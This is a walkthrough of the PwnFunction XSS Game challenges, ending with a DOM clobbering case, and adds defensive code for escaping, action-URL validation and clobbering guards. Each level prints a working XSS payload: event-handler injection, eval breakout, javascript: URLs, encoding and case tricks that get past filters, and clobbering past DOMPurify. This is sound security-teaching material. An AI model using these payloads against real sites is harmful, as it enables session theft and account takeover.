Some XSS Case Studies and a DOM Clobbering Case

Contents

Ma Spaghet!
Jefff
Ugandan Knuckles
Ricardo Milos
Ah That's Hawt
Ligma
Mafia
Ok, Boomer (DOM clobbering)

Site: XSS Game - Learning XSS Made Simple! | Created by PwnFunction

Ma Spaghet!

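Let's analyze the code.

The code uses the URL class to read the GET parameter somebody, falling back to the default Somebody when no parameter is supplied. It then places the value into innerHTML, which renders it inside the h2 tag.

I noticed innerHTML: it disables one approach, the <script> tag, but that is the only tag it restricts, so we can write the payload with an <img> tag instead.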

?somebody=<img%20src=1%20onerror="alert(1337)">

Jefff

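First the GET parameter jeff is read; if no parameter is passed, it defaults to JEFFF.

Then an empty variable ma is declared and the statement `ma="Ma name ${jeff}"` is executed. Finally a timer is set, and the value of ma is assigned to the h2 tag.

This challenge differs from the previous one. The previous one used innerHTML, which is clearly less safe because it does not output tags to the page as literal text, whereas the innerText used in this challenge does write the tags out as text.

?jeff=aaa";alert(1337);"

We can substitute this into the source code to see the idea; it simply becomes:

eval(`ma="Ma name ${jeff}"`)

eval(`ma="Ma name aaa";alert(1337);""`)

Alternatively, use - like this; it acts as a connecting operator:

?jeff="-alert(1337)-"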

Ugandan Knuckles

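The filter simply strips my < and > characters.

The input element contains a value passed by the user. Normally we would just close the double quote and write <script>, but < and > are filtered. So what we can use now is an event handler such as onclick or onfocus, adding the autofocus attribute so that it fires automatically.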

?wey=aaa"%20onfocus=alert(1337)%20autofocus="
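The defensive counterpart to Ma Spaghet! and Ugandan Knuckles, as an added example that is not code from the challenge: deleting `<` and `>` leaves the attribute context open, while encoding for the output context keeps the whole value inside it. The function names are hypothetical, and the weak filter is reconstructed from the description above.

```javascript
// Added example (not the challenge's code). The weak filter is written
// from this page's description of Ugandan Knuckles.
function stripAngleBrackets(s) {
  return String(s).replace(/[<>]/g, '');
}

// Encode every character that can end the current HTML context instead
// of deleting a few known-bad ones.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Attribute context (Ugandan Knuckles) and element-body context (Ma Spaghet!).
function renderInput(value, encode) {
  return `<input type="text" value="${encode(value)}">`;
}
function renderHeading(value, encode) {
  return `<h2>${encode(value)}</h2>`;
}

// Simplified tokenizer for one tag: lists the attribute names a browser
// would see. Enough for this demo; not a general HTML parser.
function attributeNames(tag) {
  const re = /\s([a-zA-Z-]+)(?:=(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  return [...tag.matchAll(re)].map((m) => m[1]);
}

// Payloads quoted on this page, URL-decoded.
const attrPayload = 'aaa" onfocus=alert(1337) autofocus="';
const bodyPayload = '<img src=1 onerror="alert(1337)">';

const weak = attributeNames(renderInput(attrPayload, stripAngleBrackets));
const safe = attributeNames(renderInput(attrPayload, escapeHtml));
console.log(weak); // [ 'type', 'value', 'onfocus', 'autofocus' ]
console.log(safe); // [ 'type', 'value' ]
console.log(renderHeading(bodyPayload, escapeHtml));
```

In a real page the element-body case is better served by assigning to textContent instead of innerHTML, which needs no manual encoding at all.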

Ricardo Milos

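Analyzing the code first, I found a submit call inside a timer: it gets the form by its id and, after two seconds, automatically submits it to its action, and this action is the form's action attribute.

The action attribute can directly contain a JavaScript statement, for example:

With the example above, we can see that the automatic submission saves us the trouble, and we can put the JS statement directly into the parameter.

Note: there is a default action that submits to the local page, namely the #, which appears automatically after two seconds. So before entering the parameter below, remember to delete the ?milos=True# that submits locally, and then write the following: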

?ricardo=JavaScript:alert(1337)
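How a page could validate a user-supplied form action before assigning it, as an added example that is not part of the challenge: parse the value as the browser would and allow only same-origin http(s) targets. `safeFormAction`, `naiveIsSafe` and the `app.example` origin are hypothetical names used for illustration.

```javascript
// Added example; safeFormAction, naiveIsSafe and app.example are hypothetical.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Naive check, shown for contrast: a case-sensitive prefix test misses
// the mixed-case scheme used in the parameter above.
function naiveIsSafe(raw) {
  return !raw.startsWith('javascript:');
}

// Parse the value the way the browser will (the URL parser lowercases
// the scheme), then allow only same-origin http(s) targets. Anything
// else falls back to a fixed action.
function safeFormAction(raw, base, fallback = '#') {
  let url;
  try {
    url = new URL(raw, base);
  } catch {
    return fallback;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return fallback;
  if (url.origin !== new URL(base).origin) return fallback;
  return url.href;
}

const BASE = 'https://app.example/form';
// Constructed sample inputs; the first two schemes appear on this page.
const samples = [
  'JavaScript:alert(1337)',
  'mailto:alert(1337)',
  '/submit?milos=True',
  'https://other.example/x',
];

function checkAll() {
  return samples.map((s) => safeFormAction(s, BASE));
}
console.log(naiveIsSafe(samples[0])); // true: the naive check lets it through
console.log(checkAll());
```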

Ah That's Hawt

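Analyzing the code: it filters out (, ), ` and \, and then uses innerHTML to put the value into the h2 tag.

Because innerHTML is used, I thought of the solution from the first level:

?somebody=<img%20src=1%20onerror="alert(1337)">

I found that it actually filters out (), so function calls cannot be used.

So I thought of escaping them with URL encoding.

I first used %28%29 and found the result was the same as before.

So I thought of URL encoding once more, that is, first converting % into %25, with ( converted to %28 and ) to %29.

For some reason I don't understand, the %28%29 was not decoded.

I then thought of using location to turn it into a string first and execute it afterwards, but the protocol must be written at the front before the part that follows can execute.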

?markassbrownlee=<img%20src=1%20onerror=location="JavaScript:alert%25281337%2529">

Ligma

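I found that letters and digits cannot be used, so the only way around is an encoding.

Here we need a website: JSFuck - Write any JavaScript with 6 Characters: []()!+

Using its output directly does not work; it must first be URL-encoded.

Then pass ?balls= followed by the long URL-encoded string obtained.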


Mafia

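Much more is filtered here: `, ', ", +, \, [ and ].

The length is also limited to 50 characters.

The specific word alert is filtered as well.

It occurred to me that switching to another function would do: confirm(1337)

?mafia=confirm(1337)

That clearly doesn't feel very meaningful.

I wondered: if all three of those functions were filtered, how would I solve it?

I remembered that Function constructs an anonymous function. With Function()(), the function is executed directly, and the code I want to run goes inside the parentheses.

So I wrote Function(/alert(1337)/)()

But then I found that it filters alert; I remembered that uppercase could get past the filter.

So I changed it to Function(/ALERT(1337)/)()

When I was learning XSS, I read that JS is strictly case-sensitive and that symbols in JS cannot be encoded.

But we can define functions, so I consulted the official reference to see whether there is a method that converts to lowercase.

I found toLowerCase()

Now it became Function(/ALERT(1337)/.source.toLowerCase())()

// anonymous function
?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

Number-to-string conversion also works: converting the number 8680439 to a string in base 30 yields alert.

eval(8680439..toString(30))(1337)

Append #alert(1337) to the end of the URL:

eval(location.hash.slice(1))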

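Ok, Boomer (DOM clobbering)

We find DOMPurify.sanitize here, a sanitizing framework that essentially cannot be bypassed. Looking up the framework's source online shows that none of the dangerous functions and code written earlier can be used.

So we have to look further down. I noticed that this ok does not seem to exist anywhere; I waited two seconds and no ok popped up.

Let's open the page and take a look first.

This confirms that ok indeed does not exist. Can we construct an ok ourselves?

When direct XSS is not possible, we can think in the direction of DOM Clobbering. I then found that DOM Clobbering can be used here.

What is DOM Clobbering?

For example:

We find that looking up an id returns the whole tag directly; that's a weakly typed language for you.

Of course this is only part of it; there is also:

The steps are:

First read cookie and find that there is nothing there.

Create a div element.

Then assign a value to the div.

Then insert the div into the body.

Then read cookie again and find that the div containing cookie is what comes back. In a weakly typed language, a lookup that was supposed to fetch by name ends up returning the whole tag.

We can write some HTML code into a web page to see:

It simply converts the element passed to appendChild on body into a string.

Then analyze further:

Object.getOwnPropertyNames(window)       // get all property names on window
  .filter(p => p.match(/Element$/))      // keep the names that end in Element
  .map(p => window[p])                   // look up the value behind each property name
  .filter(p => p && p.prototype && p.prototype.toString !== Object.prototype.toString)
  // p must have a prototype, and that prototype must have its own toString method, not the one inherited from Object

This yields two values.

We can clearly see that the second value is the a tag; in both cases we can use the href attribute to perform the string conversion.

Consulting the relevant documentation, we find:

The timer can take a function as a string and execute it.

That makes it easy: the a tag's href can stand in as the string, and the timer executes it. But we still have to get past the framework.

?boomer=<a%20id=ok%20href=mailto:alert(1337)>
?boomer=<a%20id=ok%20href=tel:alert(1337)>

Assigning boomer puts this ok into the h2 tag first. The timer below then picks up the a tag I passed in through id=ok. Once it has it, the timer calls the toString method after two seconds, so the value of the href attribute is treated in its entirety as a string and executed.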
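A defender's view of the Ok, Boomer behaviour, as an added example that is not the challenge's code: a clobbered global is an element object, never a function, so a type guard before the timer plus a scan of user markup for colliding id/name values closes the gap. `FakeAnchor`, `timerWouldCompile`, `resolveHandler` and `clobberedNames` are hypothetical names; `FakeAnchor` stands in for a real anchor element so the block runs without a browser.

```javascript
// Added example. FakeAnchor is a constructed stand-in for the element
// that <a id=ok href=...> exposes as window.ok: like a real anchor, its
// toString() returns the href.
class FakeAnchor {
  constructor(href) { this.href = href; }
  toString() { return this.href; }
}

// Browsers stringify a non-function timer handler and compile the result.
// This helper only reports what would be compiled; it never runs it.
function timerWouldCompile(handler) {
  return typeof handler === 'function' ? null : String(handler);
}

// Guard: require a real function, otherwise fall back to a handler the
// script owns, so an element found under the same name is ignored.
function resolveHandler(scope, name, fallback) {
  const candidate = scope[name];
  return typeof candidate === 'function' ? candidate : fallback;
}

// Simplified scan (regex, not a full HTML parser): which globals that the
// page reads would be shadowed by id/name attributes in this markup?
function clobberedNames(markup, globalsRead) {
  const found = new Set();
  const attr = /\s(?:id|name)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  for (const m of markup.matchAll(attr)) found.add(m[1] ?? m[2] ?? m[3]);
  return globalsRead.filter((g) => found.has(g));
}

const sample = '<a id=ok href=mailto:alert(1337)>'; // markup quoted on this page
const scope = { ok: new FakeAnchor('mailto:alert(1337)') };
const noop = () => 'noop';

console.log(timerWouldCompile(scope.ok));                // mailto:alert(1337)
console.log(resolveHandler(scope, 'ok', noop) === noop); // true
console.log(clobberedNames(sample, ['ok', 'config']));   // [ 'ok' ]
```

Keeping the callback in a module-scoped `const` instead of reading it from the global object removes the lookup that clobbering relies on.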
